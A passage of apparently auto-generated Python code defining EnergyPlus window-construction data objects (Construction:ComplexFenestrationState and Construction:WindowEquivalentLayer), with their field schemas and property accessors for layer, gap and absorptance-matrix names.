'type': u'object-list'}),
(u'layer 2 directional front absoptance matrix name',
{'name': u'Layer 2 Directional Front Absoptance Matrix Name',
'pyname': u'layer_2_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2 directional back absoptance matrix name',
{'name': u'Layer 2 Directional Back Absoptance Matrix Name',
'pyname': u'layer_2_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 2 name',
{'name': u'Gap 2 Name',
'pyname': u'gap_2_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 2 directional front absoptance matrix name',
{'name': u'Gap 2 Directional Front Absoptance Matrix Name',
'pyname': u'gap_2_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 2 directional back absoptance matrix name',
{'name': u'Gap 2 Directional Back Absoptance Matrix Name',
'pyname': u'gap_2_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3 material',
{'name': u'Layer 3 Material',
'pyname': u'layer_3_material',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3 directional front absoptance matrix name',
{'name': u'Layer 3 Directional Front Absoptance Matrix Name',
'pyname': u'layer_3_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3 directional back absoptance matrix name',
{'name': u'Layer 3 Directional Back Absoptance Matrix Name',
'pyname': u'layer_3_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 3 name',
{'name': u'Gap 3 Name',
'pyname': u'gap_3_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 3 directional front absoptance matrix name',
{'name': u'Gap 3 Directional Front Absoptance Matrix Name',
'pyname': u'gap_3_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 3 directional back absoptance matrix name',
{'name': u'Gap 3 Directional Back Absoptance Matrix Name',
'pyname': u'gap_3_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4 name',
{'name': u'Layer 4 Name',
'pyname': u'layer_4_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4 directional front absoptance matrix name',
{'name': u'Layer 4 Directional Front Absoptance Matrix Name',
'pyname': u'layer_4_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4 directional back absoptance matrix name',
{'name': u'Layer 4 Directional Back Absoptance Matrix Name',
'pyname': u'layer_4_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 4 name',
{'name': u'Gap 4 Name',
'pyname': u'gap_4_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 4 directional front absoptance matrix name',
{'name': u'Gap 4 Directional Front Absoptance Matrix Name',
'pyname': u'gap_4_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 4 directional back absoptance matrix name',
{'name': u'Gap 4 Directional Back Absoptance Matrix Name',
'pyname': u'gap_4_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5 name',
{'name': u'Layer 5 Name',
'pyname': u'layer_5_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5 directional front absoptance matrix name',
{'name': u'Layer 5 Directional Front Absoptance Matrix Name',
'pyname': u'layer_5_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5 directional back absoptance matrix name',
{'name': u'Layer 5 Directional Back Absoptance Matrix Name',
'pyname': u'layer_5_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'Construction:ComplexFenestrationState',
'pyname': u'ConstructionComplexFenestrationState',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def basis_type(self):
"""field `Basis Type`
| Default value: LBNLWINDOW
Args:
value (str): value for IDD Field `Basis Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `basis_type` or None if not set
"""
return self["Basis Type"]
@basis_type.setter
def basis_type(self, value="LBNLWINDOW"):
"""Corresponds to IDD field `Basis Type`"""
self["Basis Type"] = value
@property
def basis_symmetry_type(self):
"""field `Basis Symmetry Type`
| Default value: None
Args:
value (str): value for IDD Field `Basis Symmetry Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `basis_symmetry_type` or None if not set
"""
return self["Basis Symmetry Type"]
@basis_symmetry_type.setter
def basis_symmetry_type(self, value="None"):
"""Corresponds to IDD field `Basis Symmetry Type`"""
self["Basis Symmetry Type"] = value
@property
def window_thermal_model(self):
"""field `Window Thermal Model`
Args:
value (str): value for IDD Field `Window Thermal Model`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `window_thermal_model` or None if not set
"""
return self["Window Thermal Model"]
@window_thermal_model.setter
def window_thermal_model(self, value=None):
"""Corresponds to IDD field `Window Thermal Model`"""
self["Window Thermal Model"] = value
@property
def basis_matrix_name(self):
"""field `Basis Matrix Name`
Args:
value (str): value for IDD Field `Basis Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `basis_matrix_name` or None if not set
"""
return self["Basis Matrix Name"]
@basis_matrix_name.setter
def basis_matrix_name(self, value=None):
"""Corresponds to IDD field `Basis Matrix Name`"""
self["Basis Matrix Name"] = value
@property
def solar_optical_complex_front_transmittance_matrix_name(self):
"""field `Solar Optical Complex Front Transmittance Matrix Name`
Args:
value (str): value for IDD Field `Solar Optical Complex Front Transmittance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `solar_optical_complex_front_transmittance_matrix_name` or None if not set
"""
return self["Solar Optical Complex Front Transmittance Matrix Name"]
@solar_optical_complex_front_transmittance_matrix_name.setter
def solar_optical_complex_front_transmittance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Solar Optical Complex Front Transmittance
Matrix Name`"""
self["Solar Optical Complex Front Transmittance Matrix Name"] = value
@property
def solar_optical_complex_back_reflectance_matrix_name(self):
"""field `Solar Optical Complex Back Reflectance Matrix Name`
Args:
value (str): value for IDD Field `Solar Optical Complex Back Reflectance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `solar_optical_complex_back_reflectance_matrix_name` or None if not set
"""
return self["Solar Optical Complex Back Reflectance Matrix Name"]
@solar_optical_complex_back_reflectance_matrix_name.setter
def solar_optical_complex_back_reflectance_matrix_name(self, value=None):
"""Corresponds to IDD field `Solar Optical Complex Back Reflectance
Matrix Name`"""
self["Solar Optical Complex Back Reflectance Matrix Name"] = value
@property
def visible_optical_complex_front_transmittance_matrix_name(self):
"""field `Visible Optical Complex Front Transmittance Matrix Name`
Args:
value (str): value for IDD Field `Visible Optical Complex Front Transmittance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `visible_optical_complex_front_transmittance_matrix_name` or None if not set
"""
return self["Visible Optical Complex Front Transmittance Matrix Name"]
@visible_optical_complex_front_transmittance_matrix_name.setter
def visible_optical_complex_front_transmittance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Visible Optical Complex Front
Transmittance Matrix Name`"""
self["Visible Optical Complex Front Transmittance Matrix Name"] = value
@property
def visible_optical_complex_back_transmittance_matrix_name(self):
"""field `Visible Optical Complex Back Transmittance Matrix Name`
Args:
value (str): value for IDD Field `Visible Optical Complex Back Transmittance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `visible_optical_complex_back_transmittance_matrix_name` or None if not set
"""
return self["Visible Optical Complex Back Transmittance Matrix Name"]
@visible_optical_complex_back_transmittance_matrix_name.setter
def visible_optical_complex_back_transmittance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Visible Optical Complex Back Transmittance
Matrix Name`"""
self["Visible Optical Complex Back Transmittance Matrix Name"] = value
@property
def outside_layer_name(self):
"""field `Outside Layer Name`
Args:
value (str): value for IDD Field `Outside Layer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_layer_name` or None if not set
"""
return self["Outside Layer Name"]
@outside_layer_name.setter
def outside_layer_name(self, value=None):
"""Corresponds to IDD field `Outside Layer Name`"""
self["Outside Layer Name"] = value
@property
def outside_layer_directional_front_absoptance_matrix_name(self):
"""field `Outside Layer Directional Front Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Outside Layer Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_layer_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Outside Layer Directional Front Absoptance Matrix Name"]
@outside_layer_directional_front_absoptance_matrix_name.setter
def outside_layer_directional_front_absoptance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Outside Layer Directional Front Absoptance
Matrix Name`"""
self["Outside Layer Directional Front Absoptance Matrix Name"] = value
@property
def outside_layer_directional_back_absoptance_matrix_name(self):
"""field `Outside Layer Directional Back Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Outside Layer Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_layer_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Outside Layer Directional Back Absoptance Matrix Name"]
@outside_layer_directional_back_absoptance_matrix_name.setter
def outside_layer_directional_back_absoptance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Outside Layer Directional Back Absoptance
Matrix Name`"""
self["Outside Layer Directional Back Absoptance Matrix Name"] = value
@property
def gap_1_name(self):
"""field `Gap 1 Name`
Args:
value (str): value for IDD Field `Gap 1 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_1_name` or None if not set
"""
return self["Gap 1 Name"]
@gap_1_name.setter
def gap_1_name(self, value=None):
"""Corresponds to IDD field `Gap 1 Name`"""
self["Gap 1 Name"] = value
@property
def cfs_gap_1_directional_front_absoptance_matrix_name(self):
"""field `CFS Gap 1 Directional Front Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `CFS Gap 1 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cfs_gap_1_directional_front_absoptance_matrix_name` or None if not set
"""
return self["CFS Gap 1 Directional Front Absoptance Matrix Name"]
@cfs_gap_1_directional_front_absoptance_matrix_name.setter
def cfs_gap_1_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `CFS Gap 1 Directional Front Absoptance
Matrix Name`"""
self["CFS Gap 1 Directional Front Absoptance Matrix Name"] = value
@property
def cfs_gap_1_directional_back_absoptance_matrix_name(self):
"""field `CFS Gap 1 Directional Back Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `CFS Gap 1 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cfs_gap_1_directional_back_absoptance_matrix_name` or None if not set
"""
return self["CFS Gap 1 Directional Back Absoptance Matrix Name"]
@cfs_gap_1_directional_back_absoptance_matrix_name.setter
def cfs_gap_1_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `CFS Gap 1 Directional Back Absoptance
Matrix Name`"""
self["CFS Gap 1 Directional Back Absoptance Matrix Name"] = value
@property
def layer_2_name(self):
"""field `Layer 2 Name`
Args:
value (str): value for IDD Field `Layer 2 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_2_name` or None if not set
"""
return self["Layer 2 Name"]
@layer_2_name.setter
def layer_2_name(self, value=None):
"""Corresponds to IDD field `Layer 2 Name`"""
self["Layer 2 Name"] = value
@property
def layer_2_directional_front_absoptance_matrix_name(self):
"""field `Layer 2 Directional Front Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 2 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_2_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Layer 2 Directional Front Absoptance Matrix Name"]
@layer_2_directional_front_absoptance_matrix_name.setter
def layer_2_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 2 Directional Front Absoptance
Matrix Name`"""
self["Layer 2 Directional Front Absoptance Matrix Name"] = value
@property
def layer_2_directional_back_absoptance_matrix_name(self):
"""field `Layer 2 Directional Back Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 2 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_2_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Layer 2 Directional Back Absoptance Matrix Name"]
@layer_2_directional_back_absoptance_matrix_name.setter
def layer_2_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 2 Directional Back Absoptance Matrix
Name`"""
self["Layer 2 Directional Back Absoptance Matrix Name"] = value
@property
def gap_2_name(self):
"""field `Gap 2 Name`
Args:
value (str): value for IDD Field `Gap 2 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_2_name` or None if not set
"""
return self["Gap 2 Name"]
@gap_2_name.setter
def gap_2_name(self, value=None):
"""Corresponds to IDD field `Gap 2 Name`"""
self["Gap 2 Name"] = value
@property
def gap_2_directional_front_absoptance_matrix_name(self):
"""field `Gap 2 Directional Front Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `Gap 2 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_2_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Gap 2 Directional Front Absoptance Matrix Name"]
@gap_2_directional_front_absoptance_matrix_name.setter
def gap_2_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Gap 2 Directional Front Absoptance Matrix
Name`"""
self["Gap 2 Directional Front Absoptance Matrix Name"] = value
@property
def gap_2_directional_back_absoptance_matrix_name(self):
"""field `Gap 2 Directional Back Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `Gap 2 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_2_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Gap 2 Directional Back Absoptance Matrix Name"]
@gap_2_directional_back_absoptance_matrix_name.setter
def gap_2_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Gap 2 Directional Back Absoptance Matrix
Name`"""
self["Gap 2 Directional Back Absoptance Matrix Name"] = value
@property
def layer_3_material(self):
"""field `Layer 3 Material`
Args:
value (str): value for IDD Field `Layer 3 Material`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_3_material` or None if not set
"""
return self["Layer 3 Material"]
@layer_3_material.setter
def layer_3_material(self, value=None):
"""Corresponds to IDD field `Layer 3 Material`"""
self["Layer 3 Material"] = value
@property
def layer_3_directional_front_absoptance_matrix_name(self):
"""field `Layer 3 Directional Front Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 3 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_3_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Layer 3 Directional Front Absoptance Matrix Name"]
@layer_3_directional_front_absoptance_matrix_name.setter
def layer_3_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 3 Directional Front Absoptance
Matrix Name`"""
self["Layer 3 Directional Front Absoptance Matrix Name"] = value
@property
def layer_3_directional_back_absoptance_matrix_name(self):
"""field `Layer 3 Directional Back Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 3 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_3_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Layer 3 Directional Back Absoptance Matrix Name"]
@layer_3_directional_back_absoptance_matrix_name.setter
def layer_3_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 3 Directional Back Absoptance Matrix
Name`"""
self["Layer 3 Directional Back Absoptance Matrix Name"] = value
@property
def gap_3_name(self):
"""field `Gap 3 Name`
Args:
value (str): value for IDD Field `Gap 3 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_3_name` or None if not set
"""
return self["Gap 3 Name"]
@gap_3_name.setter
def gap_3_name(self, value=None):
"""Corresponds to IDD field `Gap 3 Name`"""
self["Gap 3 Name"] = value
@property
def gap_3_directional_front_absoptance_matrix_name(self):
"""field `Gap 3 Directional Front Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `Gap 3 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_3_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Gap 3 Directional Front Absoptance Matrix Name"]
@gap_3_directional_front_absoptance_matrix_name.setter
def gap_3_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Gap 3 Directional Front Absoptance Matrix
Name`"""
self["Gap 3 Directional Front Absoptance Matrix Name"] = value
@property
def gap_3_directional_back_absoptance_matrix_name(self):
"""field `Gap 3 Directional Back Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `Gap 3 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_3_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Gap 3 Directional Back Absoptance Matrix Name"]
@gap_3_directional_back_absoptance_matrix_name.setter
def gap_3_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Gap 3 Directional Back Absoptance Matrix
Name`"""
self["Gap 3 Directional Back Absoptance Matrix Name"] = value
@property
def layer_4_name(self):
"""field `Layer 4 Name`
Args:
value (str): value for IDD Field `Layer 4 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_4_name` or None if not set
"""
return self["Layer 4 Name"]
@layer_4_name.setter
def layer_4_name(self, value=None):
"""Corresponds to IDD field `Layer 4 Name`"""
self["Layer 4 Name"] = value
@property
def layer_4_directional_front_absoptance_matrix_name(self):
"""field `Layer 4 Directional Front Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 4 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_4_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Layer 4 Directional Front Absoptance Matrix Name"]
@layer_4_directional_front_absoptance_matrix_name.setter
def layer_4_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 4 Directional Front Absoptance
Matrix Name`"""
self["Layer 4 Directional Front Absoptance Matrix Name"] = value
@property
def layer_4_directional_back_absoptance_matrix_name(self):
"""field `Layer 4 Directional Back Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 4 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_4_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Layer 4 Directional Back Absoptance Matrix Name"]
@layer_4_directional_back_absoptance_matrix_name.setter
def layer_4_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 4 Directional Back Absoptance Matrix
Name`"""
self["Layer 4 Directional Back Absoptance Matrix Name"] = value
@property
def gap_4_name(self):
"""field `Gap 4 Name`
Args:
value (str): value for IDD Field `Gap 4 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_4_name` or None if not set
"""
return self["Gap 4 Name"]
@gap_4_name.setter
def gap_4_name(self, value=None):
"""Corresponds to IDD field `Gap 4 Name`"""
self["Gap 4 Name"] = value
@property
def gap_4_directional_front_absoptance_matrix_name(self):
"""field `Gap 4 Directional Front Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `Gap 4 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_4_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Gap 4 Directional Front Absoptance Matrix Name"]
@gap_4_directional_front_absoptance_matrix_name.setter
def gap_4_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Gap 4 Directional Front Absoptance Matrix
Name`"""
self["Gap 4 Directional Front Absoptance Matrix Name"] = value
@property
def gap_4_directional_back_absoptance_matrix_name(self):
"""field `Gap 4 Directional Back Absoptance Matrix Name`
| Reserved for future use. Leave it blank for this version
Args:
value (str): value for IDD Field `Gap 4 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_4_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Gap 4 Directional Back Absoptance Matrix Name"]
@gap_4_directional_back_absoptance_matrix_name.setter
def gap_4_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Gap 4 Directional Back Absoptance Matrix
Name`"""
self["Gap 4 Directional Back Absoptance Matrix Name"] = value
@property
def layer_5_name(self):
"""field `Layer 5 Name`
Args:
value (str): value for IDD Field `Layer 5 Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_5_name` or None if not set
"""
return self["Layer 5 Name"]
@layer_5_name.setter
def layer_5_name(self, value=None):
"""Corresponds to IDD field `Layer 5 Name`"""
self["Layer 5 Name"] = value
@property
def layer_5_directional_front_absoptance_matrix_name(self):
"""field `Layer 5 Directional Front Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 5 Directional Front Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_5_directional_front_absoptance_matrix_name` or None if not set
"""
return self["Layer 5 Directional Front Absoptance Matrix Name"]
@layer_5_directional_front_absoptance_matrix_name.setter
def layer_5_directional_front_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 5 Directional Front Absoptance
Matrix Name`"""
self["Layer 5 Directional Front Absoptance Matrix Name"] = value
@property
def layer_5_directional_back_absoptance_matrix_name(self):
"""field `Layer 5 Directional Back Absoptance Matrix Name`
Args:
value (str): value for IDD Field `Layer 5 Directional Back Absoptance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_5_directional_back_absoptance_matrix_name` or None if not set
"""
return self["Layer 5 Directional Back Absoptance Matrix Name"]
@layer_5_directional_back_absoptance_matrix_name.setter
def layer_5_directional_back_absoptance_matrix_name(self, value=None):
"""Corresponds to IDD field `Layer 5 Directional Back Absoptance Matrix
Name`"""
self["Layer 5 Directional Back Absoptance Matrix Name"] = value
class ConstructionWindowEquivalentLayer(DataObject):
""" Corresponds to IDD object `Construction:WindowEquivalentLayer`
Start with outside layer and work your way to the inside Layer
Up to 11 layers total. Up to six solid layers and up to five gaps.
Enter the material name for each layer
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'outside layer',
{'name': u'Outside Layer',
'pyname': u'outside_layer',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2',
{'name': u'Layer 2',
'pyname': u'layer_2',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3',
{'name': u'Layer 3',
'pyname': u'layer_3',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4',
{'name': u'Layer 4',
'pyname': u'layer_4',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5',
{'name': u'Layer 5',
'pyname': u'layer_5',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 6',
{'name': u'Layer 6',
'pyname': u'layer_6',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 7',
{'name': u'Layer 7',
'pyname': u'layer_7',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 8',
{'name': u'Layer 8',
'pyname': u'layer_8',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 9',
{'name': u'Layer 9',
'pyname': u'layer_9',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 10',
{'name': u'Layer 10',
'pyname': u'layer_10',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 11',
{'name': u'Layer 11',
'pyname': u'layer_11',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 2,
'name': u'Construction:WindowEquivalentLayer',
'pyname': u'ConstructionWindowEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def outside_layer(self):
"""field `Outside Layer`
Args:
value (str): value for IDD Field `Outside Layer`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_layer` or None if not set
"""
return self["Outside Layer"]
@outside_layer.setter
def outside_layer(self, value=None):
"""Corresponds to IDD field `Outside Layer`"""
self["Outside Layer"] = value
@property
def layer_2(self):
"""field `Layer 2`
Args:
value (str): value for IDD Field `Layer 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_2` or None if not set
"""
return self["Layer 2"]
@layer_2.setter
def layer_2(self, value=None):
"""Corresponds to IDD field `Layer 2`"""
self["Layer 2"] = value
@property
def layer_3(self):
"""field `Layer 3`
Args:
value (str): value for IDD Field `Layer 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_3` or None if not set
"""
return self["Layer 3"]
@layer_3.setter
def layer_3(self, value=None):
"""Corresponds to IDD field `Layer 3`"""
self["Layer 3"] = value
@property
def layer_4(self):
"""field `Layer 4`
Args:
value (str): value for IDD Field `Layer 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_4` or None if not set
"""
return self["Layer 4"]
@layer_4.setter
def layer_4(self, value=None):
"""Corresponds to IDD field `Layer 4`"""
self["Layer 4"] = value
@property
def layer_5(self):
"""field `Layer 5`
Args:
value (str): value for IDD Field `Layer 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_5` or None if not set
"""
return self["Layer 5"]
@layer_5.setter
def layer_5(self, value=None):
"""Corresponds to IDD field `Layer 5`"""
self["Layer 5"] = value
@property
def layer_6(self):
"""field `Layer 6`
Args:
value (str): value for IDD Field `Layer 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_6` or None if not set
"""
return self["Layer 6"]
@layer_6.setter
def layer_6(self, value=None):
"""Corresponds to IDD field `Layer 6`"""
self["Layer 6"] = value
@property
def layer_7(self):
"""field `Layer 7`
Args:
value (str): value for IDD Field `Layer 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_7` or None if not set
"""
return self["Layer 7"]
@layer_7.setter
def layer_7(self, value=None):
"""Corresponds to IDD field `Layer 7`"""
self["Layer 7"] = value
@property
def layer_8(self):
"""field `Layer 8`
Args:
value (str): value for IDD Field `Layer 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_8` or None if not set
"""
return self["Layer 8"]
@layer_8.setter
def layer_8(self, value=None):
"""Corresponds to IDD field `Layer 8`"""
self["Layer 8"] = value
@property
def layer_9(self):
"""field `Layer 9`
Args:
value (str): value for IDD Field `Layer 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_9` or None if not set
"""
return self["Layer 9"]
@layer_9.setter
def layer_9(self, value=None):
"""Corresponds to IDD field `Layer 9`"""
self["Layer 9"] = value
@property
def layer_10(self):
"""field `Layer 10`
Args:
value (str): value for IDD Field `Layer 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_10` or None if not set
"""
return self["Layer 10"]
@layer_10.setter
def layer_10(self, value=None):
"""Corresponds to IDD field `Layer 10`"""
self["Layer 10"] = value
@property
def layer_11(self):
"""field `Layer 11`
Args:
value (str): value for IDD Field `Layer 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `layer_11` or None if not set
"""
return self["Layer 11"]
@layer_11.setter
def layer_11(self, value=None):
"""Corresponds to IDD field `Layer 11`"""
self["Layer 11"] = value
class ConstructionWindowDataFile(DataObject):
""" Corresponds to IDD object `Construction:WindowDataFile`
Initiates search of the Window data file for a window called Name.
"""
_schema = {'extensible-fields': OrderedDict(),
